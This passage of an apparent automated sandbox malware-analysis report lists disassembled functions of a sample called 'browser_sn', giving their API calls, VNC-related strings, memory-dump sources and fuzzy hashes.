                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                            • String ID:
                                                                            • API String ID: 3283625137-0
                                                                            • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                            • Instruction ID: 64747e54099a964720f418bcf37ed80e7ac8b9db8712ac870ac1d78bc5f5d2bd
                                                                            • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                            • Instruction Fuzzy Hash: B7219221A0878186E6949F51A5412BEB2B4BF98B99F544635EFED837D6CFBCE010C700
                                                                            Function 00007FF6C2B93FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ComputerLibraryLoadName
                                                                            • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                            • API String ID: 2278097360-3189507618
                                                                            • Opcode ID: 10fb79c7f87763df2747a6739a812a0766dd5aff0ac26068f6513ed31ef1c4b4
                                                                            • Instruction ID: 5e92ce9dd778adc59a35378db4daf2b19075926dca16deec326b56afadc93fb2
                                                                            • Opcode Fuzzy Hash: 10fb79c7f87763df2747a6739a812a0766dd5aff0ac26068f6513ed31ef1c4b4
                                                                            • Instruction Fuzzy Hash: B3318D21B19B4281EB94EF2AF85436936A1EB85B4DF144138CF8D873E5EEBDD459C380
                                                                            Function 00007FF6C2BEA320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                            • String ID: WinVNC Tray Icon
                                                                            • API String ID: 2660421340-1071638575
                                                                            • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                            • Instruction ID: ae7b02ac4e958e23d3fd77ef4304aecbb8370fb1f066b50f2d00896d0a6c26de
                                                                            • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                            • Instruction Fuzzy Hash: 9F018621A08B8182E7549F52B8444A6B774FF49BD9F544036DF8D83B65EFBCD885C740
                                                                            Function 00007FF6C2BA33A0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 85COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF6C2BA3502
                                                                            • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF6C2BA3490
                                                                            • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF6C2BA3429
                                                                            • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF6C2BA33D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                            • API String ID: 1452528299-2001727811
                                                                            • Opcode ID: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                            • Instruction ID: 03bc513671e961a487bf5d703b753ee3a265f85c668c33de2e29a2d4f316b7d2
                                                                            • Opcode Fuzzy Hash: df93f2ef96d673b5cdbd6a23393152ede06451180be3b72b44c2e476be1564a9
                                                                            • Instruction Fuzzy Hash: 1641E866A05A82C1EB909F66C0883FC37A1EB85F4EF584072CE4D873A1DFB9D589C310
                                                                            Function 00007FF6C2BA88A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
                                                                            • String ID: <unavailable>
                                                                            • API String ID: 4131039871-1096956887
                                                                            • Opcode ID: 8b55b09e85d7b53b89b4cd63b014f510ade4f7f6fe36729922b2c1c6a87ebc0f
                                                                            • Instruction ID: 5f41a6d211a83e6e67357bd4490aeff6f3ebb412cbdf52affaa203362a813845
                                                                            • Opcode Fuzzy Hash: 8b55b09e85d7b53b89b4cd63b014f510ade4f7f6fe36729922b2c1c6a87ebc0f
                                                                            • Instruction Fuzzy Hash: 98313A32608B81C2EB94DF24E8483A973A4FB88B9AF140135DB9D877A4DFBDD455C740
                                                                            Function 00007FF6C2BECD40 Relevance: 6.1, APIs: 4, Instructions: 52networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: connectgethostbynamehtonsinet_addr
                                                                            • String ID:
                                                                            • API String ID: 599670773-0
                                                                            • Opcode ID: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
                                                                            • Instruction ID: 903284c2a7504ce3da82ddc417c4adf559b5d5ff42accb28062c310896d003d1
                                                                            • Opcode Fuzzy Hash: f6108e8ca93ccc89ffbbcef9ae7f28c2dc192bc10360c91e264abe9a68236526
                                                                            • Instruction Fuzzy Hash: 87116322A18B0585EBA48F25E84023D36A0FF89B9EF004675EE9EC77A4DF7CE500D744
                                                                            Function 00007FF6C2C37978 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _callnewh_errno$AllocHeapmalloc
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3727741168-2104205924
                                                                            • Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                            • Instruction ID: 6367c549de5be36b9a37690a3e112953118dbe4d51750b7b94adb7c2c1e69476
                                                                            • Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
                                                                            • Instruction Fuzzy Hash: 2501D665A19B4791EA94AF15A8410F923B0BB5838EF441535DFCDC77A2EEECE168CB00
                                                                            Function 00007FF6C2BEA290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FindMessagePostWindow
                                                                            • String ID: WinVNC Tray Icon
                                                                            • API String ID: 2578315405-1071638575
                                                                            • Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                            • Instruction ID: a85fc827cb76cb7745d200b5e9e4b0a75a9a7d74ab6a3055c5f2aaab5167342a
                                                                            • Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
                                                                            • Instruction Fuzzy Hash: 92014421E18A8182EB548F12F4802696360FB99BCDF485075EF9ED3B59DFBCE4D18B40
                                                                            Function 00007FF6C2BECC40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: closesocketshutdown
                                                                            • String ID: vsocket.cpp : closing socket
                                                                            • API String ID: 572888783-2569437896
                                                                            • Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                            • Instruction ID: 616997743cce5394d1416cb2d266034387ade1e46540532e1ad3c0d3e1e19d6d
                                                                            • Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
                                                                            • Instruction Fuzzy Hash: 1FF0E776A14B4282EB149F74D4542A93320FF89B1EF204635CEAE863A5DFB8E4558391
                                                                            Function 00007FF6C2C17A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast
                                                                            • String ID:
                                                                            • API String ID: 918212764-0
                                                                            • Opcode ID: f6c25f786e2f358dbf354d43d2a9d5de121992af3151497a9cf8c62786527708
                                                                            • Instruction ID: 9fc64dba0453bfa4aecd029f42293beab0191b0e00b3feadb6ce881ef9f220e3
                                                                            • Opcode Fuzzy Hash: f6c25f786e2f358dbf354d43d2a9d5de121992af3151497a9cf8c62786527708
                                                                            • Instruction Fuzzy Hash: 9F211932A19A4686EB909F20D44536973B0FF84B4AF145032DF8E837A4DFBCD499C780
                                                                            Function 00007FF6C2BEDD90 Relevance: 4.6, APIs: 3, Instructions: 86networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: selectsend
                                                                            • String ID:
                                                                            • API String ID: 2999949978-0
                                                                            • Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                            • Instruction ID: 8b545a240df21140cee34e70fc8feabfce340e4cd780d32e5623e39161abcd3f
                                                                            • Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
                                                                            • Instruction Fuzzy Hash: 35314C26A1868345EE608F15A8487BA6394FF8674EF0450B0DECD83B50CFBDD4018680
                                                                            Function 00007FF6C2C49234 Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocHeap_callnewh_errno
                                                                            • String ID:
                                                                            • API String ID: 849339952-0
                                                                            • Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                            • Instruction ID: 8c11bd267a144f6addc428bdfcb9d4783863561f6b1253bb3d0ad1370499149e
                                                                            • Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
                                                                            • Instruction Fuzzy Hash: C0118221B0D25281FBF59F11964477A72F19F857AEF088A30CF9DC6BC5DEACA5408244
                                                                            Function 00007FF6C2B94140 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
